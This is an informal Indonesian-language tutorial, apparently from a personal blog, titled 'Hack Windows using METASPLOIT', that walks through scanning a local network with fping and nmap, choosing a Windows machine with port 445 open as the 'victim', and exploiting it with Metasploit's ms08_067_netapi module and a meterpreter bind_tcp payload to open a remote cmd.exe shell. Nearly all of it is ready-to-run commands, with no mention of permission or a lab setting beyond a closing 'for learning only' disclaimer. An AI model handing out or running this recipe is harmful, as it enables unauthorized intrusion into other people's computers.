Email : mazumam@doscom.

org

Hack Windows using METASPLOIT

wew.. keren ya judulnya... sebenernya tutorial kayak gini pasti udah banyak di internet, cuma 
lagi iseng aja sih pengen bikin tulisan tentang metasploit. Hehe.. :*
Pasti kalian semua yang sudah kenal apa itu metasploit. Kalo pengen lebih jelasnya baca aja di 
websitenya metasploit.
tapi mungkin tutorial ini baru 1 di dunia, soalnya operating sistem yang saya pakai laen dari 
yang lain.hehe...  Biasanya OS yang digunakan untuk melakukan aksi exploitasi adalah 
Backtrack. Yang memang sudah teruji kehandalannya untuk pentest (Penetration Testing). 
Mau tau apa OSnya...? :P

Nah, sekedar share aja ya, OS yang saya gunakan untuk “bermain” metasploit adalah 
TeaLinuxOS 2.0 yang sudah dimodifikasi untuk keperluan pentest :D. TeaLinuxOS adalah OS 
yang dikembangkan oleh DOSCOM. Karena TeaLinuxOS diturunkan dari Ubuntu maka tutorial 
ini juga berlaku untuk Ubuntu dan semua distro turunannya. :)

http://mazumam.web.id/
Email : mazumam@doscom.org

Yang perlu disiapkan adalah:
1. cemilan, buat ngilangin stress kalo exploitasi kita gagal mulu. :D
2. OS, terserah, yang penting Linux. :P
3. Metasploit framework , bisa donlod dulu di websitenya metasploit. Trus langsung 
diinstall ya...
4. fping, install aja langsung (sudo apt­get install fping)
5. nmap, (sudo apt­get install nmap)
6. yang terakhir adalah yang paling penting, yaitu KORBANnya.Wkwkwk...

kalo semuanya sudah siap, berikut langkah­langkahnya:
1. scan dulu semua IP yang konek dalam jaringan. Disini saya menggunakan fping.
“fping -g IP_AWAL IP_AKHIR”

2. Pilih targetnya, biasanya yang paling empuk buat dijadiin korban adalah yang make OS 
Wincrot, ups.. maksudnya Windows :) bisa pake nmap. 
Caranya “nmap -A IP_TARGET”

http://mazumam.web.id/
Email : mazumam@doscom.org

3. Cek dan pastikan kalo kita bisa terkoneksi dengan target. Gunakan saja PING
“ping IP_TARGET”

4. scan port target kita, pastikan port 445 terbuka. Karena lewat port tersebut kita akan 
melakukan exploitasi. Untuk scan port bisa pake nmap , caranya “nmap IP_TARGET”

5. jalankan metasploit,dg cara ketik “msfconsole” di terminal.

http://mazumam.web.id/
Email : mazumam@doscom.org

6. “show exploits” untuk melihat  exploit yang disediakan oleh metasploit.

7. “use windows/smb/ms08_067_netapi” 
8. “show payloads” untuk melihat payload yang ada apa aja.. :D
9. “set payload windows/meterpreter/bind_tcp”
10. “set rhost IP_TARGET”
11. “set lhost IP_KAMU”
12. yang terakhir “exploit” 

http://mazumam.web.id/
Email : mazumam@doscom.org

13. nah.. kalo sudah berhasil, untuk menjalankan cmd.exe di komputer korban caranya
“execute -f cmd.exe -c -i”

14. kalo gagal, misalnya muncul text “Exploit completed, but no session was created”. 
Nah.. ini saatnya memakan cemilan yang tadi udah disiapkan. Wkwkwk.. 
15. selamat belajar :D 

NOTE:
tulisan ini hanya untuk pembelajaran saja, saya TIDAK bertanggung jawab atas hal 
APAPUN akibat penyalahgunaan

SALAM OPEN SOURCE

any question? Please visit http://mazumam.web.id/

http://mazumam.web.id/